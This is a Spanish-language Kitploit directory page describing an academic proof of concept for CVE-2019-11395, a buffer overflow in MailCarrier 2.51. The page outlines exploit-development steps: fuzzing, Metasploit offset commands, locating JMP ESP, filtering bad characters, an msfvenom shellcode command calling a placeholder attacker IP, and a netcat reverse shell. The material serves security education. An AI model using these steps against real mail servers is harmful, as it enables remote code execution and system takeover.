Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-11395 — Prueba de concepto con fines académicos para comprender la vulnerabilidad de desbordamiento de búfer utilizando como antecedente el CVE-2019-11395 | Kitploit
Herramientas/GitHubGitHub/rafaelbicas/cve-2019-11395
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeFuzzingAprendizaje y EducaciónExplotación de Binarios
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

Prueba de concepto con fines académicos para comprender la vulnerabilidad de desbordamiento de búfer utilizando como antecedente el CVE-2019-11395

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-11395

Descripción general

Esta prueba de concepto (PoC) demuestra una vulnerabilidad de desbordamiento de búfer en MailCarrier 2.51, que permite a atacantes remotos ejecutar código arbitrario mediante una cadena larga. La vulnerabilidad puede explotarse utilizando los siguientes procesos:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

El proyecto tiene como objetivo proporcionar un enfoque académico para comprender cómo funciona el desbordamiento de búfer.


⚠️ Advertencias

Antes de ejecutar cualquier prueba, nunca utilices tu entorno de producción para experimentos iniciales. En su lugar, crea una configuración de laboratorio similar a tu entorno de producción para evitar cualquier problema o consecuencia no deseada.


🔧 Preparación

1. Descubre la vulnerabilidad

  • Utiliza la técnica de fuzzing para determinar el número aproximado de bytes necesarios para romper la aplicación.

2. Encuentra el Offset

  • Una vez que ocurra el fallo, utiliza:
    root@kitploit:~
    msf-pattern_create -l <number_of_bytes>
    

Esto ayuda a determinar el Offset, que es el número exacto de bytes necesarios para sobrescribir el EIP.

  • Utiliza el siguiente comando para confirmar el Offset
    root@kitploit:~
    msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
    

Esto identifica el número exacto de bytes requeridos para controlar el EIP.

3. Busca una instrucción JMP o CALL

  • Localiza una instrucción usando:
    root@kitploit:~
    JMP ESP
    CALL ESP
    

Usaremos esta dirección para redirigir la ejecución. Ten cuidado con ASLR, SafeSEH u otros mecanismos de protección.

4. Identifica los caracteres malos

  • Utiliza la herramienta Mona dentro de Immunity Debugger para comprobar los caracteres malos.

5. Genera el shellcode

  • Crea el shellcode excluyendo los caracteres malos:
    root@kitploit:~
    msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
    

6. Añade NOPs

  • Inserta instrucciones NOP (\x90) en el payload para mejorar la estabilidad.

7. Establece una conexión

  • Usa netcat (nc) para crear una shell inversa y conectar con el objetivo.
Descargar herramienta